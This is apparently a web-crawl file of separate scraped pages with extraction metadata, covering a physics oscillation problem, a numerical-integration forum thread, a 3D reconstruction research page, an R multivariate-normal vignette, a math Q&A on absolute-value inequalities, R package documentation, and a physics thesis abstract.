+2 08:20 accept: Proving correctness of a CFG by induction on length of strings generated

Nov 29 '14 (-2)
Nov 23 '14 (2)
Nov 20 '14 (4)
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.48189297318458557, "perplexity": 1340.485484219434}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370505550.17/warc/CC-MAIN-20200401065031-20200401095031-00051.warc.gz"}
https://www.quantumstudy.com/a-uniform-cylinder-of-length-l-and-mass-m-having-cross-sectional-area-a-is-suspended-with-its-length-vertical/
# A uniform cylinder of length L and mass M having cross-sectional area A is suspended, with its length vertical…

Q: A uniform cylinder of length L and mass M having cross-sectional area A is suspended, with its length vertical, from a fixed point by a massless spring, such that it is half-submerged in a liquid of density ρ at the equilibrium position. When the cylinder is given a small downward push and released, it starts oscillating vertically with a small amplitude. If the force constant of the spring is k, the frequency of oscillation of the cylinder is

(a) $\large \frac{1}{2\pi} (\frac{k - A \rho g}{M})^{1/2}$

(b) $\large \frac{1}{2\pi} (\frac{k + A \rho g}{M})^{1/2}$

(c) $\large \frac{1}{2\pi} (\frac{k + \rho g L^2}{M})^{1/2}$

(d) $\large \frac{1}{2\pi} (\frac{k + A \rho g}{A \rho g})^{1/2}$

Ans: (b)

Sol: Let the cylinder be displaced by an amount x from its mean position. The net restoring force is

$\large F = -(k x + A x \rho g)$

$\large M a = -(k x + A x \rho g)$

$\large a = -\frac{(k + A \rho g)}{M} x$

In S.H.M., $a = -\omega^2 x$. Hence,

$\large \omega^2 = \frac{(k + A \rho g)}{M}$

$\large \omega = \sqrt{\frac{(k + A \rho g)}{M}}$

The frequency of oscillation is

$\large f = \frac{\omega}{2\pi}$

$\large f = \frac{1}{2\pi}\sqrt{\frac{(k + A \rho g)}{M}}$
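As a quick numerical sanity check of answer (b) (a Python sketch; the parameter values below are invented for illustration and are not part of the problem):

import math

# hypothetical values, only to illustrate f = (1/(2*pi)) * sqrt((k + A*rho*g)/M)
k = 100.0      # spring constant, N/m
A = 1.0e-3     # cross-sectional area, m^2
rho = 1000.0   # liquid density, kg/m^3
g = 9.8        # gravitational acceleration, m/s^2
M = 0.5        # cylinder mass, kg

f = math.sqrt((k + A * rho * g) / M) / (2.0 * math.pi)
print(f"frequency of oscillation = {f:.2f} Hz")   # about 2.36 Hz for these values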
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9835326075553894, "perplexity": 682.8606552111929}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057447.52/warc/CC-MAIN-20210923195546-20210923225546-00697.warc.gz"}
http://www.physicsforums.com/showthread.php?t=601074
# Integrating 2nd order ODE using midpoint rule

by Niles (tags: integrating, midpoint, order, rule)

P: 1,863  Hi, I am trying to integrate Newton's equations for my system
$$a = \frac{F}{m} = \frac{d^2x}{dt^2}$$
This is only for the first coordinate of the particle. I wish to do it for y and z as well, but let us just work with x for now to make it simple. The force in the x-direction depends on the velocity in the x-direction, vx, and on the y- and z-coordinates. In other words
$$F=F(v_x, y, z)$$
Now, I wish to solve this equation, and I have currently implemented an Euler method. This is how I iterate:
$$v_{n+1} = v_n + dt\cdot a(v_{x,n},y_n,z_n) \\ x_{n+1} = x_{n} + dt\cdot v_{n}$$
I now want to improve the error and use a 2nd order Runge-Kutta method, i.e. the midpoint rule as briefly summarized here: http://www.efunda.com/math/num_ode/num_ode.cfm
I am not quite sure how to do this. In the link they say that I should generally write
$$y_{n+1} = y_{n} + dt\cdot f(x_n + dt/2, y_n + k_1/2)$$
where
$$k_1 = dt\cdot f(x_n, y_n).$$
This is where my confusion arises: what does $f(x_n + dt/2, y_n + k_1/2)$ correspond to for me? I would really appreciate a hint or two with this.
Best, Niles.

P: 26  Here you have it explained: Computational Physics, page 292, "13.4 More on finite difference methods, Runge-Kutta methods"

P: 1,863  Thanks!
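One way the midpoint rule maps onto this problem (a Python sketch of mine, not from the thread; the acceleration function is a placeholder for F/m): treat the pair (x, v) as one state with derivative (v, a), and evaluate that right-hand side at the half step.

def accel(x, v):
    """Placeholder for F/m; in the poster's case it would depend on v_x and on y, z."""
    return -x - 0.1 * v  # a damped oscillator, just for illustration

def midpoint_step(x, v, dt):
    # Euler half-step to estimate the state at t + dt/2 (this plays the role of k1/2)
    x_half = x + 0.5 * dt * v
    v_half = v + 0.5 * dt * accel(x, v)
    # full step using the derivatives evaluated at the midpoint state
    x_new = x + dt * v_half
    v_new = v + dt * accel(x_half, v_half)
    return x_new, v_new

x, v = 1.0, 0.0
for _ in range(1000):
    x, v = midpoint_step(x, v, dt=0.01)
print(x, v)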
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9368162751197815, "perplexity": 484.22280851315713}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-15/segments/1398223201753.19/warc/CC-MAIN-20140423032001-00242-ip-10-147-4-33.ec2.internal.warc.gz"}
https://jack.valmadre.net/papers/2012-cvpr-filters/
Consider a 3D object deforming non-rigidly over time, for example: The object is observed by a single moving camera. We want to recover the 3D structure from these 2D projection correspondences. Let’s assume that the camera motion relative to the background can be recovered using rigid structure from motion. With known cameras, each 2D projection of a point defines a 2x3 linear system of equations for its 3D position in that frame. The 1D nullspace of this system corresponds geometrically to a ray departing from the camera centre. This means that, using only projection constraints, there are infinitely many solutions for each point in each frame (anywhere along those rays).

However, we know intuitively that points should not jump around arbitrarily from frame to frame. Assuming that the points have mass, their motion should be smooth (since they must be accelerated by a finite force). This notion was leveraged by Akhter et al (2008), who required that the trajectory of each point be expressed as a sum of low-frequency sinusoids, i.e. lie in the subspace spanned by a truncated DCT basis. Stacking the equations for the observation of a point in all F frames yields a 2Fx3F system. Introducing a K-dimensional DCT basis for the x, y and z components of the trajectory, the system of equations becomes 2Fx3K. While this problem is not necessarily underconstrained if 3K ≤ 2F, Park et al (2010) found that significant camera motion was also required to obtain an accurate reconstruction, establishing the notion of reconstructability.

The following figure shows reconstruction error versus camera speed for varying basis size K, generated from a synthetic experiment in which human motion capture sequences (of 100 frames) are observed by an orbiting camera. The key observation here is that faster moving cameras enable more accurate reconstruction. However, you have to choose the basis size correctly or else you will either run out of capacity to represent the points’ motion (to the right) or revert to an ill-posed problem (to the left).

Park et al defined a measure of reconstructability depending on how well the camera trajectory was represented by the basis, since, if the camera centre lies on the basis, its trajectory is a trivial solution. We defined a new measure based on a theoretical bound on the reconstruction error. Our measure does not depend on the camera centre; rather, it incorporates the condition number of the linear system of equations, the ratio of the largest eigenvalue to the smallest.

The implications of this become clearer when we alternatively consider minimising the distance of the trajectory from the DCT subspace, subject to the 2D projections being exactly satisfied. Since the DCT matrix is rank 3K, the orthogonal projection matrix in the objective will have a nullspace of dimension 3K. When we reduce K, we reduce the size of this nullspace and therefore reduce the likelihood of having a poorly-conditioned system.

Consider the more general form in which the matrix in the objective is an arbitrary matrix M. We propose that the conditioning problem can be mostly avoided by choosing for M a filter matrix G, where multiplication by the matrix G is equivalent to convolution with the filter g (note that we define vector convolution to operate independently in x, y, z). We typically choose simple finite difference filters: some combination of (-1, 1) and (-1, 2, -1). If the filter has support m, then the matrix M has a nullspace of size 3(m-1), since we only compute the convolution with parts of the signal where the two inputs overlap completely (i.e.
“valid” mode in Matlab’s conv() function). Using these “trajectory filters,” we are able to achieve 3D error at the limit of reconstructability without having to choose the basis size K. The reason that this works becomes evident examining the eigenspectra of the DCT matrix (left) versus the first-difference (middle) and second-difference (right) filters. The filters do not have the many zero eigenvalues which cause the system to become poorly conditioned. A nice twist here is that the Discrete Cosine Transform diagonalises symmetric convolution in an analogous way to the Fourier transform diagonalising periodic convolution, so the eigenspectra above are actually the DCT transform of each filter. This means we can enforce the filters as a weighting in the DCT domain, although in practice it is usually more efficient to work in the time domain because the systems are sparse. This also makes it possible to reveal the filter which is equivalent to using a particular truncation of the DCT basis. The final results from our example are shown below. Red points denote the output and black the ground truth. ### Code I’ve tried to provide sufficient code and data to reproduce the figures in the paper. It’s all Matlab. Never tested with GNU Octave. This code is provided for free use, no warranty whatsoever. Run setup.m to set the path as required. The main figures (reconstruction error versus camera speed) can be generated by running solver_experiment.m. Note that averaging these experiments over as many trials as we did probably requires a compute cluster or significant hours. You can reduce the number of trials though, for slightly less-smooth curves. This experiment depends on Honglak Lee et al’s implementation of their feature-sign search algorithm for the comparison to sparse coding methods. Ensure that l1ls_featuresign.m is found in src/lee-2006/. I’m also providing the exact 100-frame mocap sequences from the CMU Motion Capture Database which we used. Thanks to Mark Cox for converting them to point clouds. Put this file in data/ before running solver_experiment.m. The actual reconstruction code is super simple and happens in reconstruct_filters.m and reconstruct_linear.m. The linear systems for projection constraints are constructed in trajectory_projection_equations.m, projection_equation.m and independent_to_full.m. The qualitative examples from real photos are generated by running real_scene_demo.m. To do this, you’ll need to download the “Real scene” data from Hyun Soo Park’s project page and unzip it to data/RealSceneData/. I’ve also re-distributed two small functions from his code in src/park-2010/.
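For intuition about these filter matrices (a NumPy sketch of my own, independent of the Matlab code distributed above): per axis, the "valid"-mode filter matrix of a filter with support m has a nullspace of dimension m - 1, in contrast to the rank-3K DCT projection.

import numpy as np

def filter_matrix(F, filt=(-1.0, 2.0, -1.0)):
    # Each row applies the filter to one length-m window of a length-F signal,
    # i.e. "valid"-mode filtering written as an (F - m + 1) x F matrix.
    m = len(filt)
    G = np.zeros((F - m + 1, F))
    for i in range(F - m + 1):
        G[i, i:i + m] = filt
    return G

F = 100
G = filter_matrix(F)                    # second-difference filter, support m = 3
nullity = F - np.linalg.matrix_rank(G)
print(G.shape, nullity)                 # (98, 100) and nullspace dimension m - 1 = 2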
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8326136469841003, "perplexity": 856.9797816535608}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875145960.92/warc/CC-MAIN-20200224132646-20200224162646-00167.warc.gz"}
http://stephens999.github.io/fiveMinuteStats/mvnorm_eigen.html
Last updated: 2021-03-01

library(mvtnorm)

Warning: package 'mvtnorm' was built under R version 3.6.2

## Pre-requisites

You should be familiar with the Multivariate normal distribution, and with the eigen-decomposition for symmetric positive semi-definite (PSD) matrices.

## Introduction

Getting an intuition for what the $$p$$-dimensional multivariate normal distribution, $$N_p(\mu,\Sigma)$$, “looks like” can be difficult.
For $$p=1,2$$ things are not too bad: we can directly visualize a univariate normal distribution by plotting its density, and visualize a bivariate normal distribution by plotting a contour plot of the density, or by simulating samples from the distribution and visualizing them using a 2d scatterplot. For example, the following code does this for $$N(0,\Sigma)$$ where $\Sigma = \begin{pmatrix} 1.0 & 0.7 \\ 0.7 & 1.0 \end{pmatrix}$:

Sigma = cbind(c(1,0.7),c(0.7,1))
X = rmvnorm(1000,c(0,0),Sigma)
plot(X[,1],X[,2],main="Samples from bivariate normal with variance Sigma",asp=1)

But in $$p=100$$ dimensions, or even just $$p=4$$ dimensions, things become much harder because direct visualization is impractical. So how can we get intuition about the multivariate normal distribution, $$N_p(\mu,\Sigma)$$, when $$p$$ is large?

Note first that the mean $$\mu$$ is just a vector of $$p$$ numbers, and generally causes few problems in interpretation: you can just think of each number as specifying the mean in each of the $$p$$ coordinates, one at a time. In contrast, the covariance matrix $$\Sigma$$ is a $$p \times p$$ matrix that captures potentially more complex patterns, and creates more challenges for intuition. One possible approach is to plot a heatmap of this matrix, and this can certainly be helpful in certain situations. However, this vignette describes a more algebraic approach, based on the eigen-decomposition of $$\Sigma$$.

## Some linear algebra

Recall that any valid $$p \times p$$ covariance matrix $$\Sigma$$ must be symmetric and positive semi-definite (PSD). Furthermore, recall that any such PSD matrix has the eigen-decomposition $\Sigma = V \Lambda V'$ where:

• $$\Lambda$$ is a $$K \times K$$ diagonal matrix with the non-zero eigenvalues of $$\Sigma$$, $$\lambda_1,\dots,\lambda_K$$ say, on the diagonal ($$K \leq p$$ is the rank of $$\Sigma$$).
• $$V$$ is a $$p \times K$$ orthonormal matrix ($$V'V=I_K$$), whose columns $$v_1,\dots,v_K$$ are the normalized eigenvectors of $$\Sigma$$ corresponding to the non-zero eigenvalues.

Recall also that if $$Z \sim N_p(0, I_p)$$ and $$A$$ is any $$n \times p$$ matrix then $$\mu + AZ \sim N(\mu, AA')$$.

Now apply this last result with $$A= V \Lambda^{0.5}$$ where $$\Lambda^{0.5}$$ is the diagonal matrix with $$\lambda_1^{0.5},\dots,\lambda_K^{0.5}$$ on the diagonal. We get $\mu + V \Lambda^{0.5} Z \sim N_p(\mu, V \Lambda^{0.5} \Lambda^{0.5} V').$ That is, $\mu + V \Lambda^{0.5} Z \sim N_p(\mu, \Sigma).$ We can write the matrix product $$V\Lambda^{0.5} Z$$ as a sum to make the structure more obvious: $\mu + \sum_{k=1}^K \lambda_k^{0.5} z_k v_k \sim N_p(\mu, \Sigma).$ Here $$\mu$$ and $$v_1,\dots,v_K$$ are all column vectors of length $$p$$, whereas the $$\lambda_k$$ and $$z_k$$ are all scalars.

### Interpretation as a random linear combination of eigenvectors

From this algebra, if $$X \sim N_p(\mu,\Sigma)$$, then we can think of $$X$$ as being generated by taking the mean $$\mu$$ and adding a random linear combination of the eigenvectors of $$\Sigma$$. Specifically $X = \mu + \sum_{k=1}^K b_k v_k,$ where the weights $b_k=\lambda_k^{0.5} z_k \sim N(0,\lambda_k)$ are independent of one another. Note that if $$\lambda_k$$ is small then $$b_k \approx 0$$, so the eigenvectors with small eigenvalues contribute little to $$X$$, and we can focus on the eigenvectors with large eigenvalues. Indeed, this approach provides the simplest insights when most of the $$\lambda_k$$ are negligible, and only one or two eigenvectors contribute meaningfully to the sum.
## Example: rank 1 covariance

To make a simple example, set $$\mu=0$$ and assume $$\Sigma$$ is a rank 1 matrix. That is, $$\Sigma$$ has only one eigenvector: $\Sigma = \lambda vv'$ for some $$p$$-vector $$v$$. In this case the algebra above gives the representation $$X= b v$$ where $$b \sim N(0,\lambda)$$. That is, $$X$$ is simply a multiple of $$v$$, where the multiplier is randomly distributed from a univariate normal. Thus in this case the randomness in $$X$$ boils down to the randomness in a single univariate normal, which is easy to visualize.

To give a specific example, suppose that $$v$$ is the vector of all 1s, $$v=(1,\dots,1)$$, and $$\lambda=1$$. That is, $$\Sigma$$ is a matrix of all 1s. Then $$X= (b,b,b,\dots,b)$$ where $$b \sim N(0,1)$$. To give another specific example, if $$v=(-1,-1,-1,1,1)$$ and $$\lambda=2$$ then $$X= (-b,-b,-b,b,b)$$ where $$b \sim N(0,2)$$.
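As a small check of the construction above (an added sketch, not part of the original vignette), one can sample via the eigen-decomposition and compare the empirical covariance with Sigma:

e = eigen(Sigma)                         # Sigma from the bivariate example above
V = e$vectors
lambda = e$values
Z = matrix(rnorm(2 * 10000), nrow = 2)   # iid standard normal z_k's
X = V %*% diag(sqrt(lambda)) %*% Z       # X = V Lambda^{1/2} Z, so X ~ N(0, Sigma)
cov(t(X))                                # should be close to Sigma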
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7707247734069824, "perplexity": 1081.1755244345593}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882570730.59/warc/CC-MAIN-20220807211157-20220808001157-00255.warc.gz"}
https://math.stackexchange.com/questions/244718/double-absolute-values
# double absolute values

I am having a little bit of a problem with an inequality with nested absolute values: $$|z^2-1| \ge |z+|1-z^2||$$ I've tried solving it by making three cases, $z\ge1$, $z\le-1$ and $z$ between $1$ and $-1$, and thus getting rid of the absolute values for $z^2-1$ and $1-z^2$, so that I am only left with one absolute value. But the solutions at the end are not what they should be based on the graph. Here, $z$ is real, and WolframAlpha gives this solution. What am I doing wrong?

Note that for any $a$ and $b$, we have $|a|\ge |b|$ iff $a^2 \ge b^2$. Apply this with $a$ the left-hand side, and $b$ the right-hand side of our expression. Thus our inequality is equivalent to $$(z^2-1)^2\ge z^2+2z|1-z^2| +(1-z^2)^2.$$ Since $(z^2-1)^2=(1-z^2)^2$, we are trying to solve the inequality $$z^2+2z|1-z^2| \le 0.\tag{1}$$ Sure killed an awful lot of absolute value signs! The inequality $(1)$ holds at $z=0$. And it is obvious that it cannot hold for positive $z$. So (remembering that from now on $z$ is negative), we are looking at the inequality $$z+2|1-z^2| \ge 0.$$ The rest is routine. We can divide into two cases, $z\le -1$ and $-1\lt z\lt 0$. It turns out that the inequality holds for all $z \le 0$, except for the numbers in the open interval $(a,b)$, where $a=-\frac{\sqrt{17}+1}{4}$ and $b= -\frac{\sqrt{17}-1}{4}$.

I am presuming that $z$ is real. The problem is that the outer absolute value on the right may change sense at other places. Say $z \lt -1$. Then $|z+|1-z^2||=|z+z^2-1|$, but now you are testing whether $z+z^2-1 \gt 0$, which doesn't change sense at those points. So you need to find some secondary cases based on what you get for the prime cases.

$|z^2-1| \ge |z+|1-z^2||$

Case 1: Suppose $z \ge 1$. Then $|z^2 - 1| = z^2 - 1$ and $|1 - z^2| = z^2 - 1$:

$z^2-1 \ge |z+(z^2-1)|$

Also $z + (z^2 - 1) > 0$ so:

$z^2-1 \ge z+(z^2-1)$

$0 \ge z$

This is a contradiction.

Case 2: Suppose $z \le -1$. Then $|z^2 - 1| = z^2 - 1$ and $|1 - z^2| = z^2 - 1$:

$z^2-1 \ge |z+(z^2-1)|$

There is a root of $z^2 + z - 1$ at $-\frac{\sqrt5 + 1}{2}$, so we must case on that.

Case 2a: Suppose $z \le -\frac{\sqrt5 + 1}{2}$, then $z^2-1 \ge z^2+z-1$, i.e. $0 \ge z$, which holds.

Case 2b: Suppose $-\frac{\sqrt5 + 1}{2} \le z \le -1$, then $z^2-1 \ge -z^2-z+1 \Rightarrow 2z^2 + z - 2 \ge 0$, which on this interval holds exactly when $z \le -\frac{\sqrt{17}+1}{4}$.

Case 3: Suppose $-1 \le z \le 1$, then $1-z^2 \ge |z+1-z^2|$. This has a root at $\frac{1-\sqrt5}{2}$, so we case there.

Case 3a: $\frac{1-\sqrt5}{2} \le z \le 1$: $1-z^2 \ge z+1-z^2$, so $0 \ge z$. Thus $\frac{1-\sqrt5}{2} \le z \le 0$ satisfies this.

Case 3b: $-1 \le z \le \frac{1-\sqrt5}{2}$: $1-z^2 \ge z^2-z-1$, so $2z^2 - z - 2 \le 0$, which on this interval holds exactly when $z \ge -\frac{\sqrt{17}-1}{4}$.

We conclude that the inequality holds for $z \le -\frac{\sqrt{17}+1}{4}$ and for $-\frac{\sqrt{17}-1}{4} \le z \le 0$. The graphing method is definitely easier here. It also may be easier to consider the potential roots first and then use more cases instead of cases-with-subcases, though ultimately those are similar arguments.

Here is a solution: $$|z+|1-z^2||\leq |1-z^2| \implies -|1-z^2|\leq z+|1-z^2|\leq |1-z^2|$$ $$\implies -2|1-z^2|\leq z\leq 0 \,.$$ From the above inequality, the solution $z$ should lie in the set $\left\{z\leq 0\right\} \cap \left\{ z\geq-2|1-z^2| \right\}$.
Working out $z \geq -2|1-z^2|$ gives $$\left\{z \geq -2|1-z^2| \right\} = \left\{z \geq -2(1-z^2) \right\} \cup \left\{z \geq -2(-1+z^2) \right\}$$ $$= ( -.78, 1.28 ) \cup \left\{ (-\infty, -1.28)\cup (.78,\infty) \right\}$$ $$= (-\infty, -1.28) \cup ( -.78, \infty ) .$$ Thus, the solution is given by $$\left\{z\leq 0\right\} \cap \left\{ z\geq -2|1-z^2| \right\}$$ $$=\left\{z\leq 0\right\} \cap \left\{ (-\infty, -1.28) \cup ( -.78, \infty ) \right\}$$ $$=\left\{\left\{z\leq 0\right\} \cap (-\infty, -1.28)\right\} \cup \left\{\left\{z\leq 0\right\} \cap ( -.78, \infty )\right\}$$ $$= \left( -\infty,-1.28\right) \cup \left(-.78, 0 \right).$$ Note: I approximated the roots when I was solving the inequalities.
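A quick numerical check of the final answer (a Python sketch added here, not part of the thread):

import numpy as np

z = np.linspace(-3.0, 3.0, 200001)
holds = np.abs(z**2 - 1) >= np.abs(z + np.abs(1 - z**2))

a = -(np.sqrt(17) + 1) / 4      # about -1.2808
b = -(np.sqrt(17) - 1) / 4      # about -0.7808
inside_gap = (z > a + 1e-9) & (z < b - 1e-9)
positive = z > 1e-9

print(np.any(holds & inside_gap))   # False: the inequality fails on (a, b)
print(np.any(holds & positive))     # False: it also fails for all positive z
print(np.all(holds[(z <= a) | ((z >= b) & (z <= 0))]))  # True everywhere else on z <= 0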
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.984227180480957, "perplexity": 163.5538585046446}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488539764.83/warc/CC-MAIN-20210623165014-20210623195014-00598.warc.gz"}
https://search.r-project.org/CRAN/refmans/cholera/html/addNeighborhoodCases.html
## Add observed cases by neighborhood.

### Description

Add cases to a plot as "address" or "fatalities" and as points or IDs.

### Usage

addNeighborhoodCases(pump.subset = NULL, pump.select = NULL,
  metric = "walking", type = "stack.base", token = "point",
  text.size = 0.5, pch = 16, point.size = 0.5, vestry = FALSE,
  weighted = TRUE, color = NULL, case.location = "nominal",
  alpha.level = 0.5, multi.core = TRUE)

### Arguments

pump.subset: Numeric. Vector of numeric pump IDs to subset from the neighborhoods defined by pump.select. Negative selection possible. NULL uses all pumps in pump.select.
pump.select: Numeric. Numeric vector of pump IDs that define which pump neighborhoods to consider (i.e., specify the "population"). Negative selection possible. NULL selects all pumps.
metric: Character. Type of neighborhood: "euclidean" or "walking".
type: Character. Type of case: "stack.base" (base of stack), or "stack" (entire stack). For observed = TRUE.
token: Character. Type of token to plot: "point" or "id".
text.size: Numeric. Size of case ID text.
pch: Numeric.
point.size: Numeric.
vestry: Logical. TRUE uses the 14 pumps from the Vestry Report. FALSE uses the 13 in the original map.
weighted: Logical. TRUE computes the shortest walking path weighted by road length. FALSE computes the shortest walking path in terms of the number of nodes.
color: Character. Use a single color for all paths. NULL uses neighborhood colors defined by snowColors().
case.location: Character. For metric = "euclidean": "address" uses ortho.proj; "nominal" uses fatalities.
alpha.level: Numeric. Alpha level transparency for area plot: a value in [0, 1].
multi.core: Logical or Numeric. TRUE uses parallel::detectCores(). FALSE uses one, single core. You can also specify the number of logical cores. See vignette("Parallelization") for details.

### Examples

## Not run:
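A minimal usage sketch (my own, not the package's documented example; it assumes the base map is drawn first with cholera::snowMap(), which this function then overlays):

library(cholera)
snowMap()                                      # draw the base map
addNeighborhoodCases(pump.select = c(6, 10))   # overlay cases for the pump 6 and pump 10 neighborhoods

## End(Not run)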
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2628030776977539, "perplexity": 29575.14758938939}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943746.73/warc/CC-MAIN-20230321193811-20230321223811-00675.warc.gz"}
https://open.library.ubc.ca/soa/cIRcle/collections/ubctheses/24/items/1.0370937
# Open Collections

## UBC Theses and Dissertations

### Infrared quantum information

Chaurette, Laurent

#### Abstract

Scattering amplitudes in massless gauge field theories have long been known to give rise to infrared divergent effects from the emission of very low energy gauge bosons. The traditional way of dealing with those divergences has been to abandon the idea of measuring amplitudes by only focusing on inclusive cross-sections constructed out of physically equivalent states. An alternative option, found to be consistent with the S-matrix framework, suggested to dress asymptotic states of charged particles by shockwaves of low energy bosons. In this formalism, the clouds of soft bosons, when tuned appropriately, cancel the usual infrared divergences occurring in the standard approach. Recently, the dressing approach has received renewed attention for its connection with newly discovered asymptotic symmetries of massless gauge theories and its potential role in the black hole information paradox. We start by investigating quantum information properties of scattering theory while having only access to a subset of the outgoing state. We give an exact formula for the von Neumann entanglement entropy of an apparatus particle scattered off a set of system particles and show how to obtain late-time expectation values of apparatus observables. We then specify to the case of quantum electrodynamics (QED) and gravity where the unobserved system particles are low energy photons and gravitons. Using the standard inclusive cross-section formalism, we demonstrate that those soft bosons decohere nearly all momentum superpositions of hard particles. Repeating a similar computation using the dressing formalism, we obtain an analogous result: In either framework, outgoing hard momentum states at late times are fully decohered from not having access to the soft bosons. Finally, we make the connection between our results and the framework of asymptotic symmetries of QED and gravity. We give new evidence for the use of the dressed formalism by exhibiting an inconsistency in the scattering of wavepackets in the original inclusive cross-section framework.
